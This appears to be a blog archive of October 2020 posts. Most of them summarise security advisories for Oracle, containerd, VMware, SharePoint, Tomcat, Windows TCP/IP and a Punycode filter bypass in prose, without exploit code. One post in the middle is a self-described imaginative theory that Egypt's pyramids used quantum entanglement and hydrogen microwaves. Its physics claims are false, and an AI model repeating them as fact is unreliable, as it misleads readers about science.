If you are Incorporating Oracle Business Intelligence Results into External Portals or Applications, you should stay alert! Oct 2020

Preface: Integrating Oracle BI Presentation Services into Corporate Environments Using HTTP and JavaScript. Java made business operation perfect. Meanwhile, it make people headache!

Background: When called from within an Oracle BI Presentation Services screen, such as a dashboard or an HTML result view, the URL should begin with the following characters: saw.dll?Go

When called from another screen on the same Web server, the URL should begin with the following characters: /analytics/saw.dll?Go

Vulnerability details: Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation) – The ‘getPreviewImage’ function is used to get a preview image of a previously uploaded theme logo. By manipulating the ‘previewFilePath’ URL parameter an attacker with access to the administration interface is able to read arbitrary system files.

Official announcement: https://www.oracle.com/security-alerts/cpuoct2020.html

CVE-2020-15157 – Vulnerability in Containerd (before version 1.2.14 )

Preface: Cloud computing build civilization chain. The strongest of AI, Smart City technology will be according to the foundation of cloud.

Technical background: Google Container Registry (GCR) is a service in Google Cloud Platform (GCP) to manage your own docker container repository. This is fully managed service and you can store your custom container images as well as common images from other image repositories.

Vulnerability details: If a container image manifest in the OCI Image format or Docker Image V2 Schema 2 format includes a URL for the location of a specific image layer (foreign layer), the default containerd resolver will follow that URL to attempt to download it. In v1.2.x, the default containerd resolver will provide its authentication credentials if the server where the URL is located presents an HTTP 401 status code along with registry-specific HTTP headers.

Highlights: The manifest supports an optional field for an external URL from which content may be fetched, and it can be any registry or domain.

Remedy: This vulnerability has been fixed in containerd 1.2.14. containerd 1.3 and later are not affected.

Workaround: Ensure that only pull images from trusted sources. Other container runtimes built on top of containerd but not using the default resolver (such as Docker) are not affected.

VMware Horizon Server and VMware Horizon Client updates address multiple security vulnerabilities (CVE-2020-3997 & CVE-2020-3998) 22-10-2020

Preface: Cross-site scripting (XSS), is a type of attack in which malicious scripts are injected into websites and web applications for the purpose of running on the end user’s device.

Background: VMware Horizon provides virtual desktop and app capabilities to users utilizing VMware’s virtualization technology. A desktop operating system – typically Microsoft Windows – runs within a virtual machine on a hypervisor.

Vulnerability details:

CVE-2020-3998 – If Horizon Client for Windows is installed on the client computer, a malicious attacker may be able to exploit victim local privileges to retrieve hashed credentials.

CVE-2020-3997 – Successful exploitation of this vulnerability on Horizon server. It may allow an attacker to inject and execute malicious script.

Should you have interested to know the details, please refer to attached diagram. For Official announcement, please refer to link – https://www.vmware.com/security/advisories/VMSA-2020-0024.html

Closer look of CVE-2020-1953 – it was impact Oracle OHF Self Service Analytics (20th Oct 2020)

Preface: As healthcare organizations look to reduce cost, IT rationalization and process transformation is accelerating as providers adopt cloud strategies.

Background: Oracle Healthcare Foundation is a feature-rich analytics platform that supports more than 35 subject areas relevant to health data analytics,giving healthcare providers more granular data regarding the requirements of individuals and populations.

Vulnerability details: YAML is a human-readable data serialization standard that can be used in conjunction with all programming languages and is often used to write configuration files. A flaw was found in the Apache Commons Configuration, where it uses a third-party library to process YAML files, which by default, allows the instantiation of classes if the YAML includes special statements. Oracle Healthcare Foundation Self-Service Analytics was impact by this vulnerability.

Official announcement https://www.oracle.com/security-alerts/cpuoct2020.html The articles is bulky, use keyword “CVE-2020-1953” find out the details.

Security Focus – ESXi OpenSLP RCE vulnerability (CVE-2020-3992)

Preface: If you like open source application. You should also like the bug he given.

OpenSLP has been ported to a wide variety of systems. For example: Linux (32/64),Windows (32/64),SCO Unix,FreeBSD,Solaris,Tru64,Mac OS X,Darwin,… OpenSLP eliminates the need for users to know the names of network hosts. With OpenSLP, the users need only know the description of the service they want to use. Based on this description, OpenSLP is then able to return the URL of the requested service.

Vulnerability details: A malicious actor residing in the management network who has access to port 427 on an ESXi machine may be able to trigger a use-after-free in the OpenSLP service resulting in remote code execution. To exploit the vulnerability, a malicious user must send a malformed SLP packet to the target system.

Remedy: https://www.vmware.com/security/advisories/VMSA-2020-0023.html

Comment: Regarding to my observation, similar of OpenSLP vulnerability found few years ago. However there is no official patch to do the remediation. Strongly believe that this bug will be exploit by cyber criminal. So it is highly recommended to disable this function.

Does it whether a myth or it is true? Quantum entanglement in Pyramid internal compartment.

Preface: The pyramid of Egypt. It is a mystery to mankind on the Earth. What is it use for? According to scientists evaluation by far. It is hard to believed that the ancient mankind have such knowledge and capabilities to build this facility.

This article was used current known materials. Furthermore, it includes my imagination and logic. So, you can treat as fiction or unknown scientific matters. Finally, I would like to pay tribute to my father of enlightenment (Zecharia Sitchin and Erich Von Daniken).

I hereby to give my respects to Osiris, Isis and Horus.

Background: Einstein opposed the Danish physicist Bohr’s theory of quantum mechanics. In March 1935, he and two of his colleagues proposed to questioning the Bohr’s theory of quantum mechanics. He wants Bohr to prove that the universe has a “ghostly ultra-distance effect” that exceeds the speed of light. Meanwhile they are formulated the famous EPR paradox.

Bohr’s theory awaken in 1982. A French Aspect team conducted experiments with calcium atoms and finally proved that there was indeed a “ghostly super-distance effect” exceeding the speed of light. This phenomenon is called “quantum entanglement.”

Does it whether a myth or it is true? Are there advanced civilizations beings in the cosmos?

People who is interested of Pyramid of Egypt will query that what is the objective of Pyramid design. The design architecture shown that the whole structure pointing to the different constellations. For example: The star shaft of King’s Chamber inside Pyramid is pointed to Orion’s belt (see below diagram for reference). Orion the brightest stars in Earth’s sky. Orion’s stars lie at distances ranging from 243 to 1360 light years. The belt stars are members of the Orion OB1b association, along with many other stars in this region, and they travel together through space. Are there advanced civilization beings in the cosmos? Furthermore, the star shaft of the pyramid points to constellations. But what is the objective? Whether for communication or else?

Reference 1: The late Sumerian civilization expert (Zecharia Sitchin), his book “The 12th Planet”. Sitchin analysis the Sumerian Cuneiform. The Sumerian clay tablets described that the creation of the ancient Sumerian culture is the Anunnaki. 

Anunnaki was a race of extraterrestrials from a planet beyond Neptune called Nibiru. However this New Planet in our Solar System not been confirmed.

Reference 2: NASA using mathematics calculation speculate that there is a new planet in space. So called Planet-X. This discovery does not mean there is a new planet in our solar system. The existence of this distant world is only theoretical at this point and no direct observation of the object nicknamed “Planet 9” have been made.

About Star Shaft of Pyramid – my observation and analysis

Engineer Christopher Dunn proposes his idea regarding the function of the Queen’s Chamber in which the chemical Hydrochloric acid (HCl) found in the southern shaft was mixed with the northern shaft chemical hydrated Zinc Chloride (ZnCl2) to produce Hydrogen (H2) gas. Part of my analysis is base on his theory. OK, be my guest to read below details.

Overview of the architecture

The diagram shown below shown ancient Egyptian fill in chemical on both left and right side of the pyramid. In realty carrying bucket of chemical not enough to support this operations. As we know, the Great Pyramid height of 455.2 ft (138.7 m). The star shaft locate in the middle of the pyramid. So refill the chemical seems not easy.And therefore it has reason to believe they are made use of other method. Please be reminded that this procedure not covered in this article.

Step 1. In order to explore the secret function of King’s Chamber. The beginning phase of my imagination will following theory founded by Christopher Dunn. For more details, please refer to below diagram. The bottom of the right hand side of diagram shown a yellow color pipe. I thought the original design has a component was lost. The overall function of this facility mainly provide a hydrlic pump function. In this article, I do not provide analysis in this area.

Step 2 & 3: According to the step 2 and step 3 shown in diagram. The chemical reaction generate heat, explosion and hydrogen when two different encounter. In additional water keep run into Subterranean Chamber, so the air pressure inside Queen’s Chamber Growth.As a result heat, explosion and hydrogen will be migrated to Grand Gallery.

Step 4: The phenomenon of this step not similar to engineer Christopher Dunn concept. Refer to below diagram, my comment is that Grand Gallery major function similar as silencer function. Apart from that it has feature which reduce the destructive vibration inside the pyramid. The Grand Gallery design in slope shape goal to reduce the possibilities to damage during chemical explosion. It was because the chemical will stay in Queens’s and low level part of Grand Gallery. Since hot air pressure will be raise up and such a way let high air pressure go to King’s Chamber. The constructed material of King’s and Queen’s chamber consists of granite. The ingredient of granite contains high density of Quartz.The chemical reaction let the internal air pressure raised. Thus huge volume of air pressure press towards to the granite. So it triggered the piezoelectric effect.

Step 5: 1935, researchers predicted that under certain high-pressure conditions, hydrogen could take on metallic properties.

The piezoelectric effect occurs through compression of a piezoelectric material. Quartz is one of the piezoelectric material. The method is placed the Quartz between the two metal plates. Under the circumstance of king’s chamber.

High pressure press towards the granite surface.The opposite side of quartz embedded in granite equivalent a electricity grounding because granite is a very good conductor of electricity. Therefore it reproduce electricity. Conceptual theory displayed as below:

Step 6: Since the whole King’s Chamber of cavity contains of hydrogen. The surface of granite covered positive electric load. Since it is a non electron equilibrium energy distribution environment. It such a way obtaining coherent microwave radiation from crystals and gases. The microwave beam will be emitted by start shaft. In additional of the star shaft points to Orion constellation. So we can go to final step. That is find out the function of pyramid. Before provide the final details of my idea. Let do a quick review of quantum entanglement.

What is quantum entanglement? A large particle quickly decays into two small particles and flies away in two opposite directions at the speed of light. When one of the particles is disturbed alone, the other particle will instantly sense at the same time, even though the two particles move away at twice the speed of light. This phenomenon that is several times faster than the speed of light is called “quantum entanglement.”

Only quantum entanglement can open the wormhole.

Time travel to the past is theoretically possible in certain general relativity spacetime geometries that permit traveling faster than the speed of light, such as traversable wormhole.

Quantum is a collective term! Photons, electrons, quarks, and neutrinos can all be said to be quantum. There is no concept of speed in quantum mechanics! Because there is no speed operator, there is no speed eigenstate and speed eigenvalue.

Highlight (QE) : Because the electronic transition is actually an entangled system formed by electrons and other particles, changing the energy state of other particles can change the energy state of the electron. The entanglement system’s “ghost-like over-distance action” has an infinite speed of action and does not require time.

The long story describe above. We found the key elements inside King’s Chamber are Hydrogen and Microwave. Refer to the following element characteristics:

A Hydrogen atom consists of a proton and an electron which are “bound” together – the proton (positive charge) and electron (negative charge) stay together and continually interact with each other.

Phonons at GHz frequencies can pass through materials that are opaque to photons, the particles that carry light.

Remark: Phonons are particles of sound or heat.

Therefore, we can apply concept and make the thing happen. Re-use theory of statement (Highlight QE) above.The electronic transition is actually an entangled system formed by electrons and other particles, changing the energy state of other particles can change the energy state of the electron. The entanglement system’s “ghost-like over-distance action” has an infinite speed of action and does not require time. So “ghost-like over-distance action” had appear. Make the dream come true. Perhaps we can tell Albert Einstein!

So, if the advanced civilization people or the people who build pyramid. He put a Hadron Collider to create a black-hole. So they can do a time travel. My comment is that the stone coffin installed in King’s Chamber is not a coffin. It is the stand of a machine. Perhaps it is a Hadron Collider.

Reference: Can Large Hadron Collider cause black hole? First of all, yes, it is true that the LHC might create microscopic black holes. … To date, the collider still has not produced any collisions, and it is the extreme energy of those collisions — up to 14 tera-electron volts — that could potentially create a microscopic black hole.

————————–End of Document——————————————

CVE-2020-16951 – SharePoint users staying alert! (17th Oct 2020)

Preface: Perhaps it is a design limitation. SharePoint did not check the source markup of an application package which provides an opportunity to attacker. However when you read the prerequisite requirement of the proof of concept. You will feel that it might have difficulties to exploit this vulnerability. However it found a way to trigger this vulnerability. So we must be aware of it.

Vulnerability details: An authenticated attacker can craft pages to trigger a server-side include that can be leveraged to leak the web[.]config file. The attacker can leverage this to achieve remote code execution.

Prerequisite: the attacker needs AddAndCustomizePages permission enabled which is the default.

Hints: Add and Customize Pages permission is from site level, the permission is not in list permission level. When you get full control in list permission level, you may not get the permission from site level. You can add a new permission level which only includes Add and Customize Pages permission, and then create new SharePoint group with this permission level. Then add yourself into the SharePoint group and you will get the Add and Customize Pages permission from site level.
If it is in the site level, please make sure you have enable Custom Scripting in SharePoint admin center. Go to SharePoint admin center> Settings> Custom Script.

Remedy: The security update addresses the vulnerability by correcting how SharePoint checks the source markup of application packages – https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952

CVE-2020-13943 – Apache Tomcat HTTP/2 DoS (16th Oct 2020)

Preface: Slow HTTP attacks are denial-of-service (DoS) attacks. It was happened near decade ago. Such vulnerability let the people aware application security.

Background: Why do we need HTTP/2?

HTTP/2 allows the client to synchronously send multiple requests to the server through the same TCP connection, and the server can also use the same TCP connection to send back synchronously, thereby reducing additional RTT (round trip time). More……

Vulnerability details: On Jun 26 2020, vulnerability found on Apache Tomcat – limitation of system resources handling when Apache Tomcat upgrade to HTTP/2.
Above matter cause by the multi protocol function. Such design limitation cause Apache TomCat did not release the HTTP/1.1 resources. Whereby, it let the Apache Tomcat consumed all the memory thus trigger a denial of service.

Remedy (official announcement): Refer to link – http://mail-archives.us.apache.org/mod_mbox/www-announce/202010.mbox/%3C2b767c6e-dcb9-5816-bd69-a3bc0771fef3%40apache.org%3E

Microsoft Addresses Windows TCP/IP RCE/DoS Vulnerability – US Homeland security urge for public attention. (14th Oct 2020)

Preface: Before the release of IP version 6, we had a good impression of its features.

Technical background: The official technical article provides the definition of IPv6 RDNS option address length (Details refer to attached diagram – point 3).

Potential Impact: If an even length value is provided, the attacker intentionally causes the Windows TCP/IP stack to incorrectly increase the size of the network buffer by 8 bytes. Therefore it failing to account for the case where a non-RFC compliant length value is used ( because the stack internally counts in 16-byte increments). This mismatch results in the stack interpreting the last 8 bytes of the current option as the start of a second option, ultimately leading to a buffer overflow and potential RCE.

Remedy: The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets – https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898

Comment: Vulnerability hit by Microsoft cause by IP V6 design feature. Perhaps, it is a fundamental design matter. Predict that may be other vendor will encountered same matter soon.

Homograph Attack (Puny-code) – CVE-2020-25779

Preface: In order to avoid malware attack, DNS is the 1st door for quarantine. This step not difficult, see whether the domain name which calling will be included in the black list.

What is Punycode?
Unicode that converts words that cannot be written in ASCII.

Background: There are two different scenarios for the cyber threat actor to exploit.

  1. Attacker build a deceptive IDNs (Internet Domain Name) that are likely to be misled internet user.
  2. Phishing Attack is Almost Impossible to Detect when encounter Puny-code vulnerability.

Synopsis: If the DNS filter mechanism is not convert the IDN domains in its Punycode form to do the verification, it make a possibility, let the blacklist domain ignore by filter.

Example: The domain “xn--eqru1b157l[.]co” is equivalent to “黑名單[.]co”. Whereby “xn--eqru1b157l” is the Puny-code.

Vulnerability details: Trend Micro Antivirus for Mac 2020 (Consumer) Bypass Web Threat Protection via Internationalized Domain Name Homograph Attack (Puny-code) Vulnerability.

Remedy: Trend Micro has released a new build of Trend Micro Antivirus for Mac Security (Consumer). Please refer to link – https://helpcenter.trendmicro.com/en-us/article/TMKA-09949